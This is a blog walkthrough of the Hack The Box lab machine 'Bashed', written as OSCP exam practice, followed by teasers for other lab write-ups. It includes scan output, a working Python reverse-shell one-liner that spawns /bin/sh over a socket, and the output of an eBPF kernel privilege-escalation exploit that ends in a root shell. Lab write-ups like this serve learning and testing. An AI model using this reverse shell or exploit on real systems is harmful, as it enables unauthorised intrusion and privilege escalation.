TJ_Null’s OSCP Prep – HTB – Bashed

This Linux box was quiet interesting. In the webservers subdirectory there was a shell embedded in a PHP file. I used python to get a reverse shell on netcat, which gives me a better terminal. I abused a kernel exploit to get root shell.

Table Of Contents

Enumeration
Root
What I’ve learned

Enumeration

I’ll start with a NMAP scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/bashed]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.68 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 14:59 EST
Nmap scan report for 10.10.10.68
Host is up (0.030s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Only port 80 open on this machine. I’ll use gobuster to see if there are any interesting subdirectories.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/bashed]
└─# cat gobuster.result 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/23 15:10:13 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/index.html           (Status: 200) [Size: 7743]                                
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]    
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]   
/server-status        (Status: 403) [Size: 299]                                 
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
===============================================================
2022/01/23 15:10:40 Finished
===============================================================

In the /dev there is an interesting PHP file called phpbash.php. Opening the file we get a shell in the browser.

This is very interesting, but the shell is not very interactive, so I used python to get a reverse shell using netcat.

python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.10.10.68",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'

Root

To get root on machine I used a kernel exploit present on this machine.

It is possible to bypass the bpf verifier (verifier.c), load bpf code, and create a read/write primitive. The root cause of this vulnerability is improper arithmetic/sign-extention in the ‘check_alu_op()’ function located within verifier.c. The improper arithmetic makes it possible for sign extension to occur in either of the following cases:
BPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)
BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

And exploiting this vulnerablity.

www-data@bashed:/tmp$ ./45010 
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003a983c00
[*] Leaking sock struct from ffff88003b753400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003a8dafc0
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff88003a8dafc0
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

What I’ve learned

There might be a shell running on the webserver. Havent encoutered that before, so that was interesting.
Always stabilize the shell you get so not to loose connection.

TJ_Null’s OSCP Prep – HTB – Tabby

Byaghanim April 5, 2022April 5, 2022

On this Linux machine I abused LFI to find the password for admin panel for Tomcat. From there I used CLI to upload .WAR file to get a reverse shell. In /var/www there was a zip file which was password protected. Cracking the password using John, we find the credentials for the user Ash. From…

Writeups

TJ_Null’s OSCP Prep – HTB – Forest

Byaghanim February 7, 2022February 7, 2022

This is an Active Directory machine. After enumerating SMB it leaks a list of users. I then used impacket-GetNPUsers to look for users without Kerberos pre-authentication required attribute. There was one user, svc-alfresco, which didnt have kerberos pre-authentication enabled and I got a hash. I cracked the hash using john the ripper, and used Evil-WinRM…

Writeups

ArcheType CTF – HTB

Byaghanim June 17, 2021January 25, 2022

Table Of ContentsEnumerationGain accessPrivSec Enumeration In the enumeration stage I start off by doing an NMAP scan. There are a couple of interesting ports open, among other things port 445 (SMB) and 1433 (mssql). I’ll run ‘enum4linux’ against the server. The interesting take from that scan was that it dosent require username or password to…

Writeups

TJ_Null’s OSCP Prep – HTB – Arctic

Byaghanim February 1, 2022February 1, 2022

This Windows machine was a relativly easy machine. There was FMTP server running on port 8500, and in that FMTP it was pointing to /administrator directory which was running Adobe Cold Fusion. Cold fusion was vulnerable to file upload RCE which we exploited and got a shell. I then used MS10-059 vulnerabilty to get a…

Writeups

TJ_Null’s OSCP Prep – HTB – Nibble

Byaghanim February 18, 2022February 18, 2022

This Linux machine was running a vulnerable blog running the engine Nibbleblog which was vulnerable to arbitrary file upload. To get root shell I used command injection i a script the user was able to run as sudo. Table Of ContentsEnumerationInitial Access – Shell as NibblerUsername && passwordShell method 1Method 2RootEnumerationInject malicious commandWhat I’ve learned…

Writeups

TJ_Null’s OSCP Prep – HTB – Optimum

Byaghanim January 15, 2022January 26, 2022

Another Windows box, this one however had two CVEs that we could abuse to get initial access and root. It would be possible to use metasploit and be done with this machine in under 10 minutes, however I will not use metasploit on this machine. Table Of ContentsEnumerationInitial AccessPrivilege EscalationMS16-032What I’ve learned Enumeration I’ll start…

Enumeration

Root

What I’ve learned

Similar Posts